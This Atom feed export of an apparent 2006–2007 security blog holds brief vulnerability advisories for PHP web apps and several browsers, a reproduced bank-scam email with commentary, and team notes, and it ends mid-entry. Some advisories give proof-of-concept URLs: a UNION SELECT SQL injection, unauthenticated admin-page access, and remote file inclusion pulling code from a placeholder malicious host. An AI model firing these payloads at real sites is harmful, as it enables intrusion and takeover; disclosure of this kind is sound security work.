<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-15362515</id><updated>2012-02-01T10:52:24.890+01:00</updated><title type='text'>- UNSECURED SYSTEMS -</title><subtitle type='html'>by r0t,der4444,cembo,VietMafia</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default?start-index=101&amp;max-results=100'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>620</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-15362515.post-1161580330072213293</id><published>2007-05-17T12:03:00.000+02:00</published><updated>2007-05-17T12:10:53.141+02:00</updated><title type='text'>UNSECURED SYSTEMS vol.2 blog</title><content type='html'>we have new blog  &lt;a href="http://pridels-team.blogspot.com/"&gt;pridels-team.blogspot.com&lt;/a&gt;&lt;br /&gt;this blog will run only as archive, in new will be published fresh advisories and news from us.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-1161580330072213293?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/1161580330072213293/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=1161580330072213293' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/1161580330072213293'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/1161580330072213293'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2007/05/unsecured-systems-vol2-blog.html' title='UNSECURED SYSTEMS vol.2 blog'/><author><name>der4444</name><uri>http://www.blogger.com/profile/04634310331090864695</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-907209568996290395</id><published>2007-05-02T18:17:00.000+02:00</published><updated>2007-05-02T18:18:25.442+02:00</updated><title type='text'>DVDdb XSS vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 May  2007&lt;br /&gt;vendor:http://globalmegacorp.org/dvddb/&lt;br /&gt;affected versions: 0.6 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;DVDdb contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "movieid" parameter in "loan.php" and "s" parameter in "listmovies.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-907209568996290395?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/907209568996290395/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=907209568996290395' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/907209568996290395'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/907209568996290395'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2007/05/dvddb-xss-vuln.html' title='DVDdb XSS vuln.'/><author><name>der4444</name><uri>http://www.blogger.com/profile/04634310331090864695</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-6731191783102374360</id><published>2007-05-02T18:10:00.000+02:00</published><updated>2007-05-02T18:12:26.426+02:00</updated><title type='text'>PHPChain vuln.</title><content type='html'>PHPChain vuln.&lt;br /&gt;###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 May  2007&lt;br /&gt;vendor:http://www.globalmegacorp.org/PHPChain/&lt;br /&gt;affected versions: 1.0 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;PHPChain contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "catid" parameter in "settings.php" and in "cat.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;Also there is full path disclosure , "attacker" will get full installisations path by testing XSS examples in vuln. parameters.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-6731191783102374360?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/6731191783102374360/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=6731191783102374360' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/6731191783102374360'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/6731191783102374360'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2007/05/phpchain-vuln.html' title='PHPChain vuln.'/><author><name>der4444</name><uri>http://www.blogger.com/profile/04634310331090864695</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-392855134382032742</id><published>2007-05-02T04:24:00.000+02:00</published><updated>2007-05-02T04:38:42.092+02:00</updated><title type='text'>FileRun Vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 2 May  2007&lt;br /&gt;vendor:http://filerun.dreamhosters.com/&lt;br /&gt;affected versions: 1.0 and previous&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;FileRun contains a flaw that allows a remote sql injection attacks.Input passed to the "fid" parameter isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;FileRun contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "page","module","section"  isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-392855134382032742?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/392855134382032742/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=392855134382032742' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/392855134382032742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/392855134382032742'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2007/05/filerun-vuln.html' title='FileRun Vuln.'/><author><name>der4444</name><uri>http://www.blogger.com/profile/04634310331090864695</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-117516478286002294</id><published>2007-03-29T13:32:00.000+02:00</published><updated>2007-04-13T15:04:09.986+02:00</updated><title type='text'>AlstraSoft Video Share Enterprise - Information disclosure &amp; SQL injection vuln</title><content type='html'>&lt;p&gt;       &lt;/p&gt;============================&lt;br /&gt;discovered by : VietMafia&lt;br /&gt;developer's site: www.alstrasoft.com&lt;br /&gt;script: AlstraSoft Video Share Enterprise&lt;br /&gt;risk: medium&lt;br /&gt;status: unpatched&lt;br /&gt;============================&lt;br /&gt;&lt;br /&gt;This script has a vuln which can be exploited by malicious people to disclose sensitive information &amp; access to system as administrator.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.The file siteadmin/useredit.php can be accessed without any authetication. User's info can be viewed &amp;amp; edited after that.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;http://host/path/siteadmin/useredit.php?uid=userid&lt;br /&gt;&lt;br /&gt;2.SQL injection&lt;br /&gt;&lt;br /&gt;after we got access as a registered user there's a sql inj vuln in msg.php file&lt;br /&gt;&lt;br /&gt;poc :  http://host/path/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1&lt;br /&gt;&lt;br /&gt;thanks DH for helping me verify this. :)&lt;br /&gt;&lt;br /&gt;===============================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-117516478286002294?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/117516478286002294/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=117516478286002294' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/117516478286002294'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/117516478286002294'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2007/03/alstrasoft-video-share-enterprise.html' title='AlstraSoft Video Share Enterprise - Information disclosure &amp; SQL injection vuln'/><author><name>VietMafia</name><uri>http://www.blogger.com/profile/16601854636290307996</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-117498091555004708</id><published>2007-03-27T10:34:00.000+02:00</published><updated>2007-03-31T09:15:49.166+02:00</updated><title type='text'>come back</title><content type='html'>Der4444,&lt;br /&gt;&lt;br /&gt;check ur email krustevs at gmail. I dont see you on icq.&lt;br /&gt;&lt;br /&gt;Vietmafia&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-117498091555004708?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/117498091555004708/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=117498091555004708' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/117498091555004708'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/117498091555004708'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2007/03/come-back.html' title='come back'/><author><name>VietMafia</name><uri>http://www.blogger.com/profile/16601854636290307996</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-117208285220614136</id><published>2007-02-21T19:34:00.000+01:00</published><updated>2007-03-27T17:43:21.876+02:00</updated><title type='text'>Crash.</title><content type='html'>Hello guys!&lt;br /&gt;No new entries for long time , board is down more than half year.&lt;br /&gt;Everthing looks dead, so it was also.&lt;br /&gt;Lets say somebody from us had alot of jobs behind this scene other ones take some hollydays.&lt;br /&gt;But now i think we can continue wht we had started.&lt;br /&gt;I still miss contacts to Vietmafia and cembo,but guys if you read this post let me know if we can count of you in team.&lt;br /&gt;Just mail me krustevs at gmail&lt;br /&gt;or via icq 476010452&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-117208285220614136?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/117208285220614136/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=117208285220614136' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/117208285220614136'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/117208285220614136'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2007/02/crash.html' title='Crash.'/><author><name>der4444</name><uri>http://www.blogger.com/profile/04634310331090864695</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115687637581495213</id><published>2006-08-29T20:30:00.000+02:00</published><updated>2007-02-26T23:11:53.396+01:00</updated><title type='text'>A Book A Day</title><content type='html'>From this day forward you will be able to find a new e-book about programming, every day. They are posted at &lt;a href="http://www.unsecured-systems.com/forum/"&gt;our forums&lt;/a&gt;. E-books about other topics coming soon as well.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115687637581495213?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115687637581495213/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115687637581495213' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115687637581495213'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115687637581495213'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/08/book-day.html' title='A Book A Day'/><author><name>cembo</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115336487921012393</id><published>2006-07-20T05:06:00.000+02:00</published><updated>2007-03-10T13:40:00.403+01:00</updated><title type='text'>PhpHostBot remote File Inclusion Vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 20 july 2006&lt;br /&gt;vendor:www.idevspot.com/PhpHostBot.php&lt;br /&gt;affected versions:PhpHostBot 1.0 / AutoHost 3.0 &lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vulnerability Description:&lt;br /&gt;&lt;br /&gt;PhpHostBot contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.&lt;br /&gt;User input passed to the "page" parameter in "order/index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;http://[victim]/order/index.php?page=http://[malicious_site]/file&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115336487921012393?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115336487921012393/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115336487921012393' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115336487921012393'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115336487921012393'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/07/phphostbot-remote-file-inclusion-vuln.html' title='PhpHostBot remote File Inclusion Vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115336471428373023</id><published>2006-07-20T05:03:00.000+02:00</published><updated>2006-08-23T16:40:47.013+02:00</updated><title type='text'>PhpLinkExchange remote File Inclusion Vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 20 july 2006&lt;br /&gt;vendor:www.idevspot.com/PhpLinkExchange.php&lt;br /&gt;affected versions: 1.0 and prior&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vulnerability Description:&lt;br /&gt;&lt;br /&gt;PhpLinkExchange contains a flaw that allows a remote file inclusion,which can be exploited by malicious people to compromise a vulnerable system.&lt;br /&gt;User input passed to the "page" parameter in "index.php" isn't properly verified before being used to include files. This can be exploited to include scripts from external resources by passing an URL to a remote site.&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;http://[victim]/index.php?page=http://[malicious_site]/file&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115336471428373023?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115336471428373023/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115336471428373023' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115336471428373023'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115336471428373023'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/07/phplinkexchange-remote-file-inclusion.html' title='PhpLinkExchange remote File Inclusion Vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115262268249583202</id><published>2006-07-11T14:56:00.000+02:00</published><updated>2007-02-27T02:00:41.976+01:00</updated><title type='text'>HiveMail vuln.</title><content type='html'>###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 11 july 2006&lt;br /&gt;vendor:http://hivemail.com/&lt;br /&gt;affected versions:&lt;br /&gt;tested on 1.3 and 1.2 versions &lt;br /&gt;other versions also can be affected. &lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;1.&lt;br /&gt;HiveMail contains a flaw that allows a remote sql injection attacks.Input passed to the "fields[]" parameter in "search.results.php"  isn't properly sanitised before being used in a SQL query.&lt;br /&gt;This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.&lt;br /&gt;&lt;br /&gt;2.&lt;br /&gt;HiveMail contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "email","cond","name" parameters in "addressbook.view.php" and input passed to the "daysprune" parameter in "index.php" and input passed to the "data[to]" parameter in "compose.email.php" and input passed to the "markas" parameter in "read.markas.php" isn't properly sanitised before being returned to the user.&lt;br /&gt;This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.&lt;br /&gt;&lt;br /&gt;3. &lt;br /&gt;It is also possible to disclose the full path to "search.results.php" by defining "searchdate" and "folderids"  parameters.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Solution:&lt;br /&gt;Edit the source code to ensure that input is properly sanitised.&lt;br /&gt;###############################################&lt;br /&gt;More information @ unsecured-systems.com/forum/&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115262268249583202?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115262268249583202/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115262268249583202' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115262268249583202'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115262268249583202'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/07/hivemail-vuln.html' title='HiveMail vuln.'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115175872491883323</id><published>2006-07-01T14:44:00.000+02:00</published><updated>2007-02-13T20:16:42.396+01:00</updated><title type='text'>Scamming</title><content type='html'>&lt;blockquote&gt;&lt;br /&gt;Title:Please, I need to hear from you now   &lt;br /&gt;&lt;br /&gt;From:Dr. James Ransome &lt;jamesransome20066@zonai.com&gt;  &lt;br /&gt;at:30. Juni 2006 09:06&lt;br /&gt;&lt;br /&gt;Barclays Bank Plc&lt;br /&gt;London, United Kingdom&lt;br /&gt;I am Dr. James Ransome , Senior Credit Officer, Barclays Bank Plc London. I am writing following an opportunity in my office that will be of immense benefit to both of us.&lt;br /&gt;In my department we discovered an abandoned sum of £12.5million British Pounds Sterling (Twelve Million Five Hundred Thousand British Pounds Sterling) in an account that belongs to one of our foreign customers Late Mr. Morris Thompson an American who unfortunately lost his life in the plane crash of Alaska Airlines&lt;br /&gt;Flight 261, which crashed on January 31 2000, including his wife and only daughter. You shall read more about the crash on visiting this website.&lt;br /&gt;&lt;http://www.cnn.com/2000/US/02/01/alaska.airlines.list/&gt;&lt;br /&gt;Since we got information about his death, we have been expecting his next of kin or relatives to come over and claim his money because the Bank cannot release the funds unless somebody applies for it as next of kin or relation to the deceased as indicated in our banking guidelines.&lt;br /&gt;Unfortunately I learnt that his supposed next of kin being his only daughter died along with him in the plane crash leaving nobody with the knowledge of this fund behind for the claim. It is therefore upon this discovery that I and two other officials in this department now decided to do business with you and release the money to you as the next of kin or beneficiary of the funds for safe keeping and subsequent disbursement since nobody is coming for it and we don't want this money to go back into Government treasury as unclaimed bill.&lt;br /&gt;We agreed that 20% of this money would be for you as foreign partner, while the balance will be for my colleagues and I. We will visit your country for the disbursement according to the percentages indicated above once this money gets into your account. Please be honest to me as trust is our watchword in this transaction.&lt;br /&gt;Note that this transaction is confidential and risk free. As soon as you receive this mail you should contact me by return mail whether or not you are willing to enter into this deal. In the event you are not interested, I sincerely ask that you disregard this email and tell no one about it. I am very careful on truncating my banking career should you mention this to someone else. I hope you can be trusted in this regard.&lt;br /&gt;Please note that all necessary arrangement for the smooth release of these funds to you has been finalized. We will discuss much in details when I do receive your response.&lt;br /&gt;Please in your response include your telephone and fax numbers for a better communication between us.&lt;br /&gt;You can reach me on the email below&lt;br /&gt;Best regards&lt;br /&gt;James Ransome&lt;br /&gt;Email: jamesransome20067@zonai.com&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;He he, first at all If some person will say that he works for some company, thats means thathe also will use that company´s email and not from "zonai.com"&lt;br /&gt;But thats also not a point ,with emails there is alot of tricks how to survive .&lt;br /&gt;&lt;br /&gt;Next point is how like in this example Brclays bank manager have my email?&lt;br /&gt;Let me answer , my email you will become with spammers software like Mail grabber.&lt;br /&gt;&lt;br /&gt;OK. that we everybody now, that money is stollen not from dead American person , but for normal live costumers from some ecommerce site on net or using some poor IE exploits to get they trojan on victims maschine.&lt;br /&gt;&lt;br /&gt;For me is intrestnig, that point... if you will say that you had belived to those gangsters  and they used your bank account for they illegal money transfers, than you are not guilty. &lt;br /&gt;&lt;br /&gt;But lets say, that you belived to those gangsters , but you was to greedy to be happy with they offered 20%  and you taked all money. &lt;br /&gt;&lt;br /&gt;In both ways you will get in contact with your country law instances. &lt;br /&gt;&lt;br /&gt;And guess wich way is better ?&lt;br /&gt;&lt;br /&gt;Third one?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15362515-115175872491883323?l=pridels0.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pridels0.blogspot.com/feeds/115175872491883323/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15362515&amp;postID=115175872491883323' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115175872491883323'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15362515/posts/default/115175872491883323'/><link rel='alternate' type='text/html' href='http://pridels0.blogspot.com/2006/07/scamming.html' title='Scamming'/><author><name>r0t</name><uri>http://www.blogger.com/profile/08921451354908857908</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15362515.post-115143614539370515</id><published>2006-06-27T21:20:00.000+02:00</published><updated>2007-04-12T06:02:48.493+02:00</updated><title type='text'>Multiple Browsers Information Disclosure vuln.</title><content type='html'>Multiple Browsers Information Disclosure vuln.&lt;br /&gt;&lt;br /&gt;###############################################&lt;br /&gt;Vuln. discovered by : r0t&lt;br /&gt;Date: 27 june 2006&lt;br /&gt;###############################################&lt;br /&gt;&lt;br /&gt;Vuln. Description:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Multiple Browsers contains a flaw which can be exploited by malicious people to disclose potentially sensitive information.&lt;br /&gt;An error in the handling of redirections can be exploited to access documents served from another web site via the "object.documentElement.outerHTML" property. &lt;br /&gt;&lt;br /&gt;Affected browsers:&lt;br /&gt;&lt;br /&gt;MYweb4net Browser 3.8.8.0&lt;br /&gt;http://www.mybrowser.web4net.net/&lt;br /&gt;&lt;br /&gt;GreenBrowser 3.4.0622&lt;br /&gt;http://www.morequick.com/&lt;br /&gt;&lt;br /&gt;Maxthon v1.5.6 build 42&lt;br /&gt;http://www.maxthon.com/&lt;br /&gt;&lt;br /&gt;PhaseOut 5.4.4&lt;br /&gt;http://www.phaseout.net/&lt;br /&gt;&lt;br /&gt;FineBrowser Freeware version v3.2.2&lt;br /&gt;http://www.finebrowser.com/&lt;br /&gt;&lt;br /&gt;Slim Browser 4.07 build 100&lt;br /&gt;http://www.flashpeak.com/&lt;br /&gt;&lt;br /&gt;NetCaptor 4.5.7 Personal Edition&lt;br /&gt;http://www.netcaptor.com/&lt;br /&gt;&lt;br /&gt;Enigma Browser 3.8.8&lt;br /&gt;http://www.suttondesigns.com/&lt;br /&gt;&lt;br /&gt;Fast Browser  Pro 8.1&lt;br /&gt;http://fastbrowser.net/&lt;br /&gt;&lt;br /&gt;GoSuRF Browser 2.62&lt;br /&gt;http://gosurfbrowser.com/?ln=en&lt;br /&gt;&lt;br /&gt;Previous versions off those browsers also can be affected.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tested on Windows XP/SP2 and IE 6 ( some of those browsers use IE engine to run, but offcourse not vuln. IE 6.0 was used for that tests.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;note: This advisory is based on Plebo Aesdi Nael advisory in IE.&lt;br /&gt;&lt;br /&gt;Reff url: 